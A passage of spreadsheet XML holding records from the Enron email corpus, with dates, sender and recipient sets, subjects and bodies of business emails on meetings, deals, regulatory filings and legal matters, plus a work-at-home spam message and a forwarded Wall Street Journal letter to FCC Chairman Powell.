me know if you have any concerns about my edits.  I would like to send this_x000D_
to Peoples end of day today.  I will follow up with Structuring to find a_x000D_
body to model the underlying asset position._x000D_
_x000D_
Thanks - Gregg_x000D_
_x000D_
(See attached file: MEH Risk Policy 061200.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 06:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'slava.brin@chase.com'})</t>
  </si>
  <si>
    <t>frozenset({'bill.w.brown@enron.com', 'jeffrey.mcmahon@enron.com', 'jwoolbert@baincap.com', 'szide@baincap.com', 'andy.west@enron.com', 'pedgerly@baincap.com', 'catherine.pernot@enron.com', 'mnunnelly@baincap.com', 'ksmalls@baincap.com', 'sbhargava@baincap.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>Conference Call on Monday</t>
  </si>
  <si>
    <t xml:space="preserve">Please note the Conference Call information for Monday, November 20th at 5:00_x000D_
p.m. E.S.T._x000D_
_x000D_
 USA Toll Free Number: 888-810-3946_x000D_
_x000D_
 PASSCODE: ENRON_x000D_
 LEADER:   Mr Bill Sperry_x000D_
_x000D_
Regards,_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Oct 2001 09:42:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'denis.tu@enron.com', 'john.keiser@enron.com', 'caroline.barnes@enron.com', 'pamela.daily@enron.com', 'steve.gilbert@enron.com', 'e..rosenberg@enron.com', 'james.centilli@enron.com', 'james.saunders@enron.com', 'thomas.meers@enron.com', 'jerry.peters@enron.com', 'tracy.geaccone@enron.com', 'kathy.campos@enron.com', 'morris.brassfield@enron.com'})</t>
  </si>
  <si>
    <t>2002 Issues</t>
  </si>
  <si>
    <t>Please begin to develop a list of issues (your top ten) that we need to be worrying about in ETS for 2002.      We will jointly develop your lists into a larger list for ETS.   I would like to think you caould have this done by the end of next week._x000D_
_x000D_
Rod Hayslett_x000D_
EB4054_x000D_
713-853-6178</t>
  </si>
  <si>
    <t>Wed, 1 May 2002 16:38:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>Jeffrey Oh's birthday</t>
  </si>
  <si>
    <t>Hey Lisa-_x000D_
 _x000D_
  Here is the information for the SUPRISE 'party' for Jeffrey's birthday.  His B'day is Friday and we are going to have a party for him (and another friend named Ron who's birthday is Thursday) this Saturday.  Since this is Cinco De Mayo weekend, we are going to go to Who Song and Larry's in John's Landing, but it will be packed, so we are all going to meet up at the Willamette Athletic Club in the Cafe', which is right across the street. We will have snacks and cake at the Club and then walk over to Who Song &amp; Larry's together so we all get in together. Who Song's will have drinks, food, dancing, etc._x000D_
_x000D_
 Please let me know if you can make it.  _x000D_
_x000D_
  Thanks,_x000D_
_x000D_
  Virginia_x000D_
  my home email: pinnocchio@hotmail.com_x000D_
_x000D_
DATE: 	Saturday May 4, 2002_x000D_
TIME: 	4:15 p.m. (Jeff and I will be there around 4:30 p.m.) _x000D_
PLACE: Willamette Athletic Club,  4949 SW Landing Drive, Portland, 97201,  phone: (503) 225-1068_x000D_
OTHER:  If you can't make it to the club cafe, please join us after 4:45 or 5:00 pm at Who Song and Larry's across the street._x000D_
_x000D_
Map to Willamette Athletic Club: (Call me if you need better details.  It's a little complicated to find the first time)_x000D_
http://maps.yahoo.com/py/pmap.py?Pyt=Typ&amp;addr=4949+SW+Landing+Dr&amp;city=Portland&amp;state=OR&amp;slt=45.487000&amp;sln=-122.674600&amp;name=Willamette+Athletic+Club&amp;zip=97201&amp;country=us&amp;BFCat=&amp;BFClient=&amp;mag=10&amp;desc=(503)+225-1068&amp;cs=9&amp;newmag=9&amp;ds=n</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 10:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.w.pereira@enron.com'})</t>
  </si>
  <si>
    <t>PEREIRA, SUSAN W,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CHAVEZ, ALEJANDRA_x000D_
HALSTEAD, LIA_x000D_
LOOCKE, KELLY_x000D_
SANCHEZ, CHRISTINA_x000D_
VILLARREAL, JESSE</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 06:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/06/2001 _x000D_
02:55 PM ---------------------------_x000D_
_x000D_
_x000D_
David Ikenberry &lt;daveike@rice.edu&gt; on 02/06/2001 01:39:58 PM_x000D_
To: Vince.J.Kaminski@enron.com_x000D_
cc: ostdiek@rice.edu _x000D_
Subject: _x000D_
_x000D_
_x000D_
Hi Vince,_x000D_
_x000D_
I just now heard back from Andrew Karolyi.  He will be here on Monday March_x000D_
12.  Would you be available for dinner either on Sunday March 11 or Monday_x000D_
March 12?_x000D_
Thanks, Dave_x000D_
_x000D_
_x000D_
***********************************_x000D_
Prof. David Ikenberry_x000D_
Jones Graduate School of Management_x000D_
Rice University_x000D_
713-348-5385_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 08:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Deal 453938.01</t>
  </si>
  <si>
    <t>Hello-_x000D_
Diana Scholtes  11/08_x000D_
Enron Sells Idaho_x000D_
99.50_x000D_
Mid C_x000D_
_x000D_
We have term 11/10-11/11/2000_x000D_
_x000D_
Bloomberg has term 11/13-11/30-2000_x000D_
_x000D_
please let me know_x000D_
thanks</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 06:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'thane.twiggs@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'joe.gordon@enron.com', 'george.wood@enron.com', 'mark.bernstein@enron.com', 'dana.davis@enron.com', 'gautam.gupta@enron.com', 'michael.brown@enron.com', 'ricardo.perez@enron.com', 'jeffrey.miller@enron.com', 'sarah.novosel@enron.com', 'john.llodra@enron.com', 'chris.dorland@enron.com', 'janelle.scheuer@enron.com', 'david.guillaume@enron.com', 'narsimha.misra@enron.com', 'stephen.plauche@enron.com', 'tom.dutta@enron.com', 'tom.may@enron.com', 'joe.quenet@enron.com', 'scott.healy@enron.com', 'paul.broderick@enron.com', 'jeffery.ader@enron.com', 'jennifer.stewart@enron.com', 'christi.nicolay@enron.com', 'robert.stalford@enron.com', 'paul.thomas@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>ISO-NE failure to mitigate ICAP market -- Release of ISO NE_x000D_
 confidential information</t>
  </si>
  <si>
    <t xml:space="preserve">The New England Conference of Public Utilities Commissioners (NECUPUC) filed _x000D_
an Answer if Support of the Motion of the Maine Public Utilities Commission _x000D_
for Disclosure of Information._x000D_
NECUPUC supports the request for the release of the unredacted copies of _x000D_
ISO-NE's September 21, 2000 Answer in this case.  In the alternative, they _x000D_
would ask that the Commission provide to the regulators that are parties to _x000D_
the proceeding unredacted copies of the ISO's September 21, 2000 Answer _x000D_
subject to an appropriate protective order._x000D_
_x000D_
_x000D_
_x000D_
Duke Energy North America (DENA) filed an Answer that opposes the MPUC _x000D_
request for public information._x000D_
_x000D_
DENA argues that only a  three month lag in the release of confidential _x000D_
information is impermissible under a prior FERC ruling in the NSTAR Services _x000D_
Co. case which set out a six-month lag rule for the release of information._x000D_
Their second argument was that the request seeks information for all NEPOOL _x000D_
markets and not just the ICAP market which is subject to the suit._x000D_
If the FERC authorizes the release of confidential information, then it _x000D_
should be subject to a protective order which contains the following:_x000D_
The information may only be used for the purposes of this docket._x000D_
Only specifically named "reviewing Reps associated with the MPUC may review _x000D_
the information._x000D_
The confidential materials may not be removed from the NE-ISO's premises._x000D_
The reviewing rep must execute a nondisclosure certificate._x000D_
_x000D_
_x000D_
Answer to the MPUC's Motion for Disclosure of Information from Northeast _x000D_
Utilities Service Company and Select Energy and request for expedited _x000D_
commission action.  NUSCO and Select Energy Support MPUC's request for _x000D_
disclosure of information that the ISO has filed under seal, but opposes the _x000D_
selective disclosure of this information to the MPUC and other regulatory _x000D_
commissions and not other participants.   NUSCO and Select Energy request _x000D_
expedited action due the financial implications and there is also _x000D_
considerable uncertainty regarding prices in the residual ICAP market in _x000D_
January, February and March of 2000 due to the suspended settlement pending _x000D_
Commission guidance._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 04:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'william.kendrick@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Bill you may want to sit in on this if you have time.  It seems we have items _x000D_
of concern that were identified during the consolidated audit at Bakersfield _x000D_
which were tied into  a previous agreement with Koch for which the action _x000D_
team did not know when the action items were prepared.  The action dates are _x000D_
approaching and   Scott and I are having a hard time getting clearification _x000D_
on how to initiate getting the the action items started due to the _x000D_
responsibility of Koch for some of the items.  Ed, the attorney for EOTT,  _x000D_
will be requested by Lou, to notify Koch concerning their responsiblity.  If _x000D_
this sounds convoluted, then you know as much as I..... _x000D_
---------------------- Forwarded by Larry Campbell/ET&amp;S/Enron on 05/18/2001 _x000D_
09:26 AM ---------------------------_x000D_
From: Jan Cobden/ENRON@enronXgate on 05/17/2001 04:05 PM CDT_x000D_
To: edward.attanasio@eott.com@SMTP@enronXgate, _x000D_
scott.jones@eott.com@SMTP@enronXgate, Larry Campbell/ET&amp;S/Enron@ENRON, Louis _x000D_
Soldano/ENRON@enronXgate_x000D_
cc:  _x000D_
_x000D_
Subject: Conference Call_x000D_
_x000D_
The conference call will be held Friday May 18th at 3:00pm CST.  The dial in _x000D_
number is _x000D_
1-800-713-8600, and the Passcode is 2357._x000D_
_x000D_
_x000D_
Thank you,_x000D_
Jan for Lou Soldano_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 12:09:38 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ken.e.randolph@dynegy.com'})</t>
  </si>
  <si>
    <t>Would you have any interest in lunch this coming  Wednesday( or another day this week if Wednesday doesn't work)?</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 01:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Carr Futures Research : Data Updates</t>
  </si>
  <si>
    <t>(See attached file: Retail Sales.pdf)(See attached file: PPI.pdf)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
      Carr Futures_x000D_
      150 S. Wacker Dr., Suite 1500_x000D_
      Chicago, IL 60606  USA_x000D_
      Tel:  312-368-6149_x000D_
      Fax:  312-368-2281_x000D_
      soblander@carrfut.com_x000D_
      http://www.carrfut.com_x000D_
 - Retail Sales.pdf_x000D_
 - PPI.pdf</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 22:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.dickin@enron.com'})</t>
  </si>
  <si>
    <t>Re: Hyatt price</t>
  </si>
  <si>
    <t>Thanks Jon._x000D_
_x000D_
As I expected, it is not going to happen today. We need to have them fully ratify our latest contract (except for final price) prior to them being able to sign a faxed copy. I'll let you know when this becomes warm again._x000D_
_x000D_
Mark._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jonathan McKay_x000D_
05/24/2001 01:58 PM_x000D_
To:	Mark Dickin/CAL/ECT@ECT_x000D_
cc:	 _x000D_
_x000D_
Subject:	Re: Hyatt price   _x000D_
_x000D_
_x000D_
1 Year	6.00_x000D_
2 Year	5.92_x000D_
3 Year	5.84_x000D_
5 Year	5.80_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;Embedded StdOleLink&gt;</t>
  </si>
  <si>
    <t>Mon, 20 Mar 2000 02:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paul.smith@enron.com'})</t>
  </si>
  <si>
    <t>Re: Australian Approvals</t>
  </si>
  <si>
    <t>1.  Per my discussion last week with David Minns, I sent him a spreadsheet so _x000D_
he could scroll across the product list and see the full range of products _x000D_
EnronOnline offers so he could determine whether an Australian based _x000D_
counterparty will have any legal problems entering into any of the _x000D_
EnronOnline products.  It was my understanding that he had not seen a _x000D_
comprehensive list off all the products we offer._x000D_
_x000D_
2.  However, on a going forward basis, David Minns or someone in Legal will _x000D_
need to see the daily spreadsheets reflecting any new Australian based _x000D_
counterparties because every new counterparty requesting a password needs a _x000D_
Credit and a Legal signoff for trading every products we offer, whether _x000D_
physical, financial, power, gas, liquids, weather, p&amp;p, US, European or other _x000D_
country based product, etc..  Houston Legal does it every day for every new _x000D_
Houston Credit based counterparty, London Legal does it every day for every _x000D_
new London Credit based counterparty and Australian Legal will need to do the _x000D_
same.  If some other system will be in place in Australia, David Minns will _x000D_
need to discuss that with Mark Taylor and David Forster.</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 13:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">According to Tammy Shepperd who is very involved in space allocation for the new building, a location for Sheri Thomas' Product Control Group remains up in the air.  Sheri, Andy Zipper, John Cummings, and Surresh have met to discuss space, and all agree that Sheri's group needs to be located with their groups.  My understanding is that you have designated a certain number of spaces for ENW on the trading floors, but that Sheri's group is not included in that count.  Can we get together when you return to the office next week and discuss floor space?  Thanks.  --Sally </t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 09:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.comello@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'clem.cernosek@enron.com', 'howard.camp@enron.com', 'daren.farmer@enron.com', 'sabrae.zajac@enron.com'})</t>
  </si>
  <si>
    <t>Per the request of Howard Camp, Please plan to attend the following meeting:_x000D_
_x000D_
Topic: Vastar_x000D_
Date: Tuesday, August 22_x000D_
Time: 4-5 PM_x000D_
Place: EB3749_x000D_
_x000D_
_x000D_
Thanks,_x000D_
Mary x35999</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 05:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: auction stuff</t>
  </si>
  <si>
    <t xml:space="preserve">I sure will - and you're about right. My first free minute should be in _x000D_
approximately 12 years. See you then!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mollie Gustafson_x000D_
11/17/2000 01:13 PM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: auction stuff_x000D_
_x000D_
Kate,_x000D_
_x000D_
When you get a minute (at 8:00 tonight?), would you, please show Theresa and _x000D_
I were the auction stuff is in Word?  I am going to have her call the vendors _x000D_
we haven't hear from (the majority of them) on Monday._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Mollie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 29 Apr 2001 22:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gc1bd81@post.sk'})</t>
  </si>
  <si>
    <t>frozenset({'recipients@lockers-pl.com.au', 'undisclosed@mailman.enron.com'})</t>
  </si>
  <si>
    <t>Work at Home &amp; Make Great Money!                         35931</t>
  </si>
  <si>
    <t>Tired of the 40 X 40 X 40 Plan? You know:_x000D_
_x000D_
Work 40 hours per week for someone else for 40 years, then receive a 40% _x000D_
reduction in pay!_x000D_
_x000D_
Is working for a "boss" too demeaning and unrewarding?_x000D_
_x000D_
Are you sick of depending on a job with too little pay and too many hours _x000D_
with no personal reward and even less future?_x000D_
_x000D_
If you're determined to retire in the next 2 - 5 years with enough income to _x000D_
have REAL Financial Independence and Freedom, and are not afraid to work for _x000D_
it, I can help you._x000D_
_x000D_
I am looking for people with a Good Work Ethic and extraordinary Desire to _x000D_
Earn at Least $10,000 per Month Working From Home!_x000D_
_x000D_
NO SPECIAL SKILLS OR EXPERIENCE REQUIRED. We will give you all the training _x000D_
and personal support you will need to ensure your success!_x000D_
_x000D_
This LEGITIMATE HOME-BASED INCOME OPPORTUNITY can put you back in Control of _x000D_
your Time, Your Finances, and Your Life!_x000D_
_x000D_
If you've tried other opportunities in the past that have failed to live up _x000D_
to their promises, THIS IS DIFFERENT THAN ANYTHING ELSE YOU'VE SEEN!_x000D_
_x000D_
THIS IS NOT A GET-RICH-QUICK SCHEME!_x000D_
_x000D_
YOUR FINANCIAL PAST DOES NOT HAVE TO BE YOUR FINANCIAL FUTURE!_x000D_
_x000D_
CALL ONLY IF YOU ARE SERIOUS!_x000D_
_x000D_
1-800-533-9350 (Free, 24 hour, 1 minute recorded message)_x000D_
_x000D_
DON'T GO TO SLEEP WITHOUT LISTENING TO THIS!_x000D_
_x000D_
"All our dreams can come true - if we have the courage to pursue them" - Walt _x000D_
Disney_x000D_
_x000D_
_x000D_
_x000D_
To be removed from future mailings, send an email to:  t4tmx6@yahoo.com and _x000D_
type "Remove" in the subject line.</t>
  </si>
  <si>
    <t>Fri, 16 Feb 2001 06:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Bermudes</t>
  </si>
  <si>
    <t xml:space="preserve">Please keep Lance Schuler and me up to speed on these issues.  Thanks.  Mark _x000D_
Haedicke_x000D_
----- Forwarded by Mark E Haedicke/HOU/ECT on 02/16/2001 02:56 PM -----_x000D_
_x000D_
	"Vasco de Castro Ferraz Junior" &lt;vcferraz@elektro.com.br&gt;_x000D_
	02/16/2001 01:56 PM_x000D_
		 _x000D_
		 To: Gail.Brownfeld@enron.com_x000D_
		 cc: assad@elektro.com.br, Bruce.Lundstrom@enron.com, John.Novak@enron.com, _x000D_
Mark.E.Haedicke@enron.com, Orlando.gonzalez@enron.com, _x000D_
Richard.B.Sanders@enron.com, Robert.C.Williams@enron.com_x000D_
		 Subject: Re: Bermudes_x000D_
_x000D_
OK_x000D_
Once again, thank you so very much._x000D_
Vasco._x000D_
_x000D_
&gt;&gt;&gt; &lt;Gail.Brownfeld@enron.com&gt; 2/16/01 10:41:43 am &gt;&gt;&gt;_x000D_
_x000D_
     Thanks for the information.  I'll review it and contact Jim Derrick_x000D_
seeking approval both for Mr. Bermudes to represent Elektro and for the_x000D_
filing of the lawsuit.  Hopefully, I'll hear from him today.  I don't_x000D_
expect it to take longer than Monday.  Thanks for your patience._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Vasco de Castro Ferraz Junior" &lt;vcferraz@elektro.com.br&gt; on 02/15/2001_x000D_
05:20:20 PM_x000D_
_x000D_
To:   Gail.Brownfeld@enron.com _x000D_
cc:   assad@elektro.com.br, John.Novak@enron.com,_x000D_
      Orlando.gonzalez@enron.com _x000D_
_x000D_
Subject:  Bermudes_x000D_
_x000D_
_x000D_
Gail_x000D_
I have mentioned to you today by telephone about our  discussions with_x000D_
ANEEL regarding  the automatic  passthrough of taxes and legal_x000D_
encumbrances, including a legal opinion we have obtained from Sergio_x000D_
Bermudes/Marcelo Ferro law firm in relation to this subject._x000D_
Orlando and Sergio Assad are about to gave me their clearance to start a_x000D_
legal suit against ANEEL having in view its refusal to grant to Elektro_x000D_
such passthrough._x000D_
It is my opinion that this case should be handled by Bermudes._x000D_
Do you know if  Bermudes is authorized by Enron to represent us as one of_x000D_
our litigation law firms? If notI would apreciate your help to obtain such_x000D_
authorization._x000D_
Bermudes is a very well known litigation lawyer with a sound reputation in_x000D_
Brazil and abroad._x000D_
Attached you will find his legal opinion I referred above._x000D_
Sergio Bermudes / Marcelo Ferro CVs in  English can be reached in the_x000D_
internet at the following address:  www.sbadv.com.br _x000D_
Kind regards_x000D_
Vasco._x000D_
_x000D_
_x000D_
(See attached file: Elektro legal_opinion_dec12.doc)_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Mar 2001 05:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: [powell_interns] Gilder Letter to Chairman Powell</t>
  </si>
  <si>
    <t xml:space="preserve">Interesting letter...._x000D_
_x000D_
_x000D_
----- Forwarded by Sue Nord/NA/Enron on 03/01/2001 01:36 PM -----_x000D_
_x000D_
	"Pisciotta, Aileen" &lt;APisciotta@KelleyDrye.com&gt;_x000D_
	03/01/2001 10:43 AM_x000D_
		 _x000D_
		 To: "'sue.nord@enron.com'" &lt;sue.nord@enron.com&gt;, "'scott_bolton@enron.net'" _x000D_
&lt;scott_bolton@enron.net&gt;, "'sburns@enron.com'" &lt;sburns@enron.com&gt;_x000D_
		 cc: "Wilson, Heather M." &lt;HWilson@KelleyDrye.com&gt;, "Aamoth, Robert J." _x000D_
&lt;RAamoth@KelleyDrye.com&gt;_x000D_
		 Subject: FW: [powell_interns] Gilder Letter to Chairman Powell_x000D_
_x000D_
Dear Sue, Scott and Steve -- The letter below from George Gilder to FCC_x000D_
Chairman Powell sets important parameters for our "vision".  We anticipated_x000D_
that Powell would be unimpressed, if not hostile, to "open access"_x000D_
approaches, but this should put a nail in the coffin.  The watchword will be_x000D_
"innovation".  I imagine that both "Telecosm" and Hamel's "Leading the_x000D_
Revolution" are high on Powell's reading list! _x000D_
_x000D_
We look forward to talking with you next week.  Aileen._x000D_
_x000D_
-----Original Message-----_x000D_
From: Engel, Michael C. _x000D_
Sent: Wednesday, February 28, 2001 6:22 PM_x000D_
To: Telecommunications Practice Group_x000D_
Subject: FW: [powell_interns] Gilder Letter to Chairman Powell_x000D_
_x000D_
_x000D_
This is an interesting letter to Commissioner Powell published last week._x000D_
Given the level of respect that the Commissioner has for Mr. Gilder (MKP has_x000D_
repeatedly referenced Gilder's book Telecosm and speaks of him frequently),_x000D_
it may be worth reading.  In any event, it gives a pretty good 30,000 foot_x000D_
view of telecom policy considerations._x000D_
_x000D_
-----Original Message-----_x000D_
From: Paul Jackson [mailto:pjackson@fcc.gov] _x000D_
Sent: Friday, February 23, 2001 12:09 PM_x000D_
To: powell_interns@yahoogroups.com_x000D_
Subject: [powell_interns] Gilder Letter to Chairman Powell_x000D_
_x000D_
_x000D_
** Confidential **_x000D_
_x000D_
The Wall Street Journal_x000D_
Copyright (c) 2001, Dow Jones &amp; Company, Inc._x000D_
_x000D_
_x000D_
Friday, February 23, 2001_x000D_
_x000D_
_x000D_
The Broadband Economy Needs a Hero_x000D_
By George Gilder and Bret Swanson_x000D_
_x000D_
  Dear Mr. Powell:_x000D_
_x000D_
  Whether you know it or not, your leadership and decisions over the next_x000D_
four years will have more impact on the economy than those of Federal_x000D_
Reserve Chairman Alan Greenspan._x000D_
_x000D_
   Surely, our stock-market swoon of 2000 and stagnating economic growth in_x000D_
2001 are partly due to the Fed's inexplicable liquidity leash combined with_x000D_
the highest tax burden since World War II. But the chief threats to the_x000D_
21st- century economy are the politicians, bureaucrats and Silicon Valley_x000D_
know-nothings responsible for America's broadband connectivity crisis._x000D_
_x000D_
  We owe Les Vadasz of Intel an apology for making fun of his prediction_x000D_
that narrowband links would prevail into the 21st century. The Internet as_x000D_
we know it is about seven years old, yet fewer than 7 million of 100 million_x000D_
American homes enjoy broadband and its wealth of social, commercial and_x000D_
educational opportunities._x000D_
_x000D_
  Contrary to popular belief, the chief obstacle to progress is not_x000D_
entrenched Bell operating companies, but a regulatory regime that presumes_x000D_
to "level the playing field," "equalize access," and "promote competition."_x000D_
The only result of these policies has been the effective nationalization and_x000D_
paralysis of broadband._x000D_
_x000D_
  The 1996 Telecommunications Act ruled that in exchange for the right to_x000D_
enter the long-distance telephone business, the Bells must open their_x000D_
residential copper lines to competitors, as well as allow these competitors_x000D_
to locate equipment in Bell central offices and offer digital subscriber_x000D_
line (DSL) services over Bell-owned copper. In November 1999, the FCC issued_x000D_
a further decree forcing the Bells to stop dragging their feet and_x000D_
cooperate._x000D_
_x000D_
  The FCC actions spawned a new category of start-ups known as broadband_x000D_
competitive local exchange carriers (CLECs), which planned to compete with_x000D_
the Bells. Funded by billions of dollars in Silicon Valley venture capital_x000D_
and public offerings, companies like Rhythms, Northpoint, Covad and Jato_x000D_
earned praise from "libertarians" in both Washington and Palo Alto, Calif._x000D_
Northpoint even had freedom-loving former FCC Chairman Reed Hundt on its_x000D_
board._x000D_
_x000D_
  But despite all good intentions, these were not high-tech start-ups. They_x000D_
became venture capital-funded lobbying and litigation shops intent on_x000D_
forcing the Bells to share their copper. With more press releases on new_x000D_
lawsuits than on new subscribers, one of the companies epitomized the_x000D_
strategy: "Rhythms continues successful regulatory litigation." The result_x000D_
of all this lawyering? The CLECs won everything. Access to copper wherever_x000D_
they sued. Multimillion- dollar awards from the Bells. And bankruptcy._x000D_
Bankruptcy?_x000D_
_x000D_
  Late last year, Northpoint filed for Chapter 11 after Verizon withdrew an_x000D_
$800 million investment. Jato closed its doors. Rhythms cut its staff by_x000D_
23%. Covad is slashing 800 jobs and closing 260 central offices. Of Covad's_x000D_
274,000 lines in service, 92,000 are not "recognizing revenue." And all of_x000D_
this is happening in the face of massive consumer demand for broadband_x000D_
services._x000D_
_x000D_
  The problem is that DSL is risky and hard. Some studies have reported that_x000D_
50% of DSL hook-ups fail on the first try. Even amicable relationships_x000D_
between CLECs and Bells are a software nightmare, with a different billing_x000D_
and provisioning system for each service provider. Such difficulties render_x000D_
DSL not a matter of will and politics but of technical and entrepreneurial_x000D_
risks. Companies are forced to invest heavily in research and engineering_x000D_
personnel, but have few opportunities for outsized rewards._x000D_
_x000D_
  That's because Congress and the FCC set up an awkward scheme in which_x000D_
everyone got a piece of the action but no one could make any money. Often_x000D_
barred from carrying signals across long-distance boundaries, the Bells hand_x000D_
off traffic to other long-distance carriers. CLECs rent lines from the_x000D_
Bells. And Internet service providers end up doing costly customer service_x000D_
and marketing to get people signed up in the first place. In short, as many_x000D_
as four parties routinely battle for low- or negative-margin chunks of_x000D_
$40-monthly bills._x000D_
_x000D_
  By summoning new competition and then mandating the rivals cooperate in_x000D_
open access, the government effectively privatized the risks and socialized_x000D_
the profits. By December, the Bells had signed up 1.8 million users and the_x000D_
CLECs 600,000, combining for just 2.4 million DSL subscribers among the 120_x000D_
million or so copper-connected U.S. homes and businesses._x000D_
_x000D_
  Cable modems, with 4.9 million subscribers at year-end, have done better,_x000D_
but AOL Time Warner and AT&amp;T, America's two cable behemoths, are bogged down_x000D_
by the same open-access nonsense that plagues DSL. Over the past two years,_x000D_
AT&amp;T CEO Michael Armstrong acquired $140 billion in cable assets while_x000D_
watching his company's $184 billion market capitalization plummet to $81_x000D_
billion._x000D_
_x000D_
  Just last month the Federal Trade Commission ruled that AOL Time Warner_x000D_
must offer "at least one non-affiliated cable broadband ISP [Internet_x000D_
Service Provider] service on Time Warner's cable system before AOL itself_x000D_
begins offering service, followed by two other non-affiliated ISPs within 90_x000D_
days and a requirement to negotiate in good faith with others after that."_x000D_
The nation's second-largest ISP, EarthLink, will now get access to AOL's_x000D_
expensive cables pretty much for free._x000D_
_x000D_
  This regulatory morass treats the most dynamic, technically creative, and_x000D_
transformative industry in the world economy as if it were some static_x000D_
commodity market for corn or pork bellies._x000D_
_x000D_
  Mr. Chairman, in a recent speech you made the key point that innovation is_x000D_
_x000D_
more important than price competition. When it comes to leading-edge_x000D_
services and technologies, narrow price competition is almost meaningless._x000D_
Internet innovation means qualitative change, order-of-magnitude price_x000D_
reductions and constantly changing services that always constitute_x000D_
monopolies when first launched._x000D_
_x000D_
  No Internet advantage can last more than a couple of years. In 1999 and_x000D_
2000, over 150 million kilometers of optical fiber were laid world-wide,_x000D_
enough to stretch to the sun. Hundreds of billions of dollars have already_x000D_
been invested by metropolitan fiber-optic network builders (Metromedia_x000D_
Fiber, Level 3 Communications), optical hardware companies (Avanex, ONI,_x000D_
Sorrento) and optical service providers (Yipes, Cogent, Sphera). These_x000D_
companies are already rendering the metropolitan DSL debate moot with_x000D_
thousand-fold increases in price performance over existing technology._x000D_
Similar breakthroughs are on the way in residential wireless. But none of_x000D_
these deployments, including fiber to the home, can flourish under a regime_x000D_
of forced sharing of entrepreneurial assets and profits._x000D_
_x000D_
  In this environment, let the Bells compete in long-distance and extort any_x000D_
temporary profits they can from their local copper cages. Let the cable_x000D_
companies capitalize on their advantage for the few years it will last._x000D_
Allow the infinite spectrum of air and fiber to be exploited in any way its_x000D_
owners wish. Then, sit back, and nostalgically recall those early days of_x000D_
the Internet, when we naively thought a 5% economic growth rate was really_x000D_
something. The broadband economy needs a hero. President Bush and Mr._x000D_
Greenspan need a technology savior. You are the man best equipped to play_x000D_
that role._x000D_
_x000D_
  --- _x000D_
_x000D_
_x000D_
_x000D_
Paul A. Jackson_x000D_
Special Assistant to the Chairman_x000D_
Office of Chairman Michael K. Powell_x000D_
Federal Communications Commission_x000D_
445 12th Street, S.W._x000D_
Suite 8B201_x000D_
Washington, DC  20554_x000D_
Phone: 202-418-1000_x000D_
Fax: 202-418-2801_x000D_
E-mail: pjackson@fcc.gov_x000D_
Web Site: http://www.fcc.gov/commissioners/powell/_x000D_
_x000D_
PRIVILEGED AND CONFIDENTIAL_x000D_
This e-mail message is confidential, intended only for the named_x000D_
recipient(s) above and may contain information that is privileged, attorney_x000D_
work product or exempt from disclosure under applicable law. If you have_x000D_
received this message in error, or are not the named recipient(s), please_x000D_
immediately notify the sender at (202) 418-1000 and delete this e-mail_x000D_
message from your computer, Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The information contained in this E-mail message is privileged,_x000D_
confidential, and may be protected from disclosure; please be aware that any_x000D_
other use, printing, copying, disclosure or dissemination of this_x000D_
communication may be subject to legal restriction or sanction. If you think_x000D_
that you have received this E-mail message in error, please reply to the_x000D_
sender. This E-mail message and any attachments have been scanned for_x000D_
viruses and are believed to be free of any virus or other defect that might_x000D_
affect any computer system into which it is received and opened. However, it_x000D_
is the responsibility of the recipient to ensure that it is virus free and_x000D_
no responsibility is accepted by Kelley Drye &amp; Warren LLP for any loss or_x000D_
damage arising in any way from its use._x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 13:45:43 -0800 (PST)</t>
